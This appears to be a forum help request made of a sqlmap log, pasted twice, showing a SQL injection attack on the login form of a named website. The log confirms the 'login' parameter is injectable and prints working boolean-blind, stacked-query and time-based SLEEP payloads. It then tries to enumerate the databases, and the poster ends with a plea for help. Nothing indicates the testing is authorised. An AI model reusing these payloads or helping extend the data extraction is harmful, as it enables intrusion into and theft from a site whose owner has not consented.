[*] starting at 11:06:32
[11:06:32] [INFO] loading tamper module 'between'
[11:06:33] [INFO] testing connection to the target URL
sqlmap got a 302 redirect to 'http://www.stam.com:80/log_in.php?error'. Do y
ou want to follow? [Y/n] y
redirect is a result of a POST request. Do you want to resend original POST data
to a new location? [Y/n] y
[11:06:35] [INFO] checking if the target is protected by some kind of WAF/IPS/ID
S
[11:06:36] [INFO] testing if the target URL content is stable
[11:06:37] [WARNING] heuristic (basic) test shows that POST parameter 'login' mi
ght not be injectable
[11:06:37] [INFO] testing for SQL injection on POST parameter 'login'
[11:06:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:06:59] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[11:07:02] [INFO] POST parameter 'login' appears to be 'OR boolean-based blind -
WHERE or HAVING clause' injectable
[11:07:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (FLOOR)'
[11:07:02] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY
or GROUP BY clause (FLOOR)'
[11:07:03] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (EXTRACTVALUE)'
[11:07:03] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY
or GROUP BY clause (EXTRACTVALUE)'
[11:07:04] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (UPDATEXML)'
[11:07:04] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY
or GROUP BY clause (UPDATEXML)'
[11:07:05] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (FLOOR)'
[11:07:05] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause
(FLOOR)'
[11:07:05] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)
'
[11:07:06] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACT
VALUE)'
[11:07:06] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[11:07:06] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACT
VALUE)'
[11:07:06] [INFO] testing 'MySQL inline queries'
[11:07:07] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[11:07:18] [INFO] POST parameter 'login' appears to be 'MySQL > 5.0.11 stacked q
ueries (comment)' injectable
for the remaining tests, do you want to include all tests for 'MySQL' extending
provided level (3) value? [Y/n] y
[11:07:21] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[11:07:32] [INFO] POST parameter 'login' appears to be 'MySQL >= 5.0.12 AND time
-based blind' injectable
[11:07:32] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[11:07:33] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[11:07:35] [INFO] 'ORDER BY' technique appears to be usable. This should reduce
the time needed to find the right number of query columns. Automatically extendi
ng the range for current UNION query injection technique test
[11:07:45] [INFO] target URL appears to have 17 columns in query
injection not exploitable with NULL values. Do you want to try with a random int
eger value for option '--union-char'? [Y/n] y
[11:09:21] [INFO] testing 'Generic UNION query (88) - 21 to 40 columns'
[11:09:32] [INFO] testing 'Generic UNION query (88) - 41 to 60 columns'
[11:09:41] [INFO] testing 'MySQL UNION query (88) - 1 to 20 columns'
[11:10:16] [INFO] testing 'MySQL UNION query (88) - 21 to 40 columns'
[11:10:26] [INFO] testing 'MySQL UNION query (88) - 41 to 60 columns'
[11:10:36] [INFO] checking if the injection point on POST parameter 'login' is a
false positive
POST parameter 'login' is vulnerable. Do you want to keep testing the others (if
any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 380 HTTP(s) r
equests:
Parameter: login (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: login=-2053' OR 8796=8796-- waFX&password=N3tsp@rker-
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (comment)
Payload: login=test';SELECT SLEEP(5)#&password=N3tsp@rker-
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: login=test' AND SLEEP(5)-- pSnb&password=N3tsp@rker-
[11:13:44] [WARNING] changes made by tampering scripts are not included in shown
payload content(s)
[11:13:44] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.16
back-end DBMS: MySQL > 5.0.11
[11:13:44] [INFO] fetching database names
[11:13:44] [INFO] fetching number of databases
[11:13:44] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[11:14:12] [INFO] retrieved: "%
[11:14:12] [ERROR] unable to retrieve the number of databases
[11:14:12] [INFO] falling back to current database
[11:14:12] [INFO] fetching current database
[11:14:22] [WARNING] there was a problem decoding value '7' from expected hexade
cimal form
[11:14:22] [INFO] retrieved: 7
available databases [1]:
[*] 7
[11:14:22] [INFO] fetched data logged to text files under 'C:\Users\USER.sqlmap
\output\www.stam.com'
[*] shutting down at 11:14:22
C:\Python27\sqlmap>
helpme stam :)
[*] starting at 11:06:32
[11:06:32] [INFO] loading tamper module 'between'
[11:06:33] [INFO] testing connection to the target URL
sqlmap got a 302 redirect to 'http://www.stam.com:80/log_in.php?error'. Do y
ou want to follow? [Y/n] y
redirect is a result of a POST request. Do you want to resend original POST data
to a new location? [Y/n] y
[11:06:35] [INFO] checking if the target is protected by some kind of WAF/IPS/ID
S
[11:06:36] [INFO] testing if the target URL content is stable
[11:06:37] [WARNING] heuristic (basic) test shows that POST parameter 'login' mi
ght not be injectable
[11:06:37] [INFO] testing for SQL injection on POST parameter 'login'
[11:06:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:06:59] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[11:07:02] [INFO] POST parameter 'login' appears to be 'OR boolean-based blind -
WHERE or HAVING clause' injectable
[11:07:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (FLOOR)'
[11:07:02] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY
or GROUP BY clause (FLOOR)'
[11:07:03] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (EXTRACTVALUE)'
[11:07:03] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY
or GROUP BY clause (EXTRACTVALUE)'
[11:07:04] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (UPDATEXML)'
[11:07:04] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY
or GROUP BY clause (UPDATEXML)'
[11:07:05] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (FLOOR)'
[11:07:05] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause
(FLOOR)'
[11:07:05] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)
'
[11:07:06] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACT
VALUE)'
[11:07:06] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[11:07:06] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACT
VALUE)'
[11:07:06] [INFO] testing 'MySQL inline queries'
[11:07:07] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[11:07:18] [INFO] POST parameter 'login' appears to be 'MySQL > 5.0.11 stacked q
ueries (comment)' injectable
for the remaining tests, do you want to include all tests for 'MySQL' extending
provided level (3) value? [Y/n] y
[11:07:21] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[11:07:32] [INFO] POST parameter 'login' appears to be 'MySQL >= 5.0.12 AND time
-based blind' injectable
[11:07:32] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[11:07:33] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[11:07:35] [INFO] 'ORDER BY' technique appears to be usable. This should reduce
the time needed to find the right number of query columns. Automatically extendi
ng the range for current UNION query injection technique test
[11:07:45] [INFO] target URL appears to have 17 columns in query
injection not exploitable with NULL values. Do you want to try with a random int
eger value for option '--union-char'? [Y/n] y
[11:09:21] [INFO] testing 'Generic UNION query (88) - 21 to 40 columns'
[11:09:32] [INFO] testing 'Generic UNION query (88) - 41 to 60 columns'
[11:09:41] [INFO] testing 'MySQL UNION query (88) - 1 to 20 columns'
[11:10:16] [INFO] testing 'MySQL UNION query (88) - 21 to 40 columns'
[11:10:26] [INFO] testing 'MySQL UNION query (88) - 41 to 60 columns'
[11:10:36] [INFO] checking if the injection point on POST parameter 'login' is a
false positive
POST parameter 'login' is vulnerable. Do you want to keep testing the others (if
any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 380 HTTP(s) r
equests:
Parameter: login (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: login=-2053' OR 8796=8796-- waFX&password=N3tsp@rker-
[11:13:44] [WARNING] changes made by tampering scripts are not included in shown
payload content(s)
[11:13:44] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.16
back-end DBMS: MySQL > 5.0.11
[11:13:44] [INFO] fetching database names
[11:13:44] [INFO] fetching number of databases
[11:13:44] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[11:14:12] [INFO] retrieved: "%
[11:14:12] [ERROR] unable to retrieve the number of databases
[11:14:12] [INFO] falling back to current database
[11:14:12] [INFO] fetching current database
[11:14:22] [WARNING] there was a problem decoding value '7' from expected hexade
cimal form
[11:14:22] [INFO] retrieved: 7
available databases [1]:
[*] 7
[11:14:22] [INFO] fetched data logged to text files under 'C:\Users\USER.sqlmap
\output\www.stam.com'
[*] shutting down at 11:14:22
C:\Python27\sqlmap>
helpme stam :)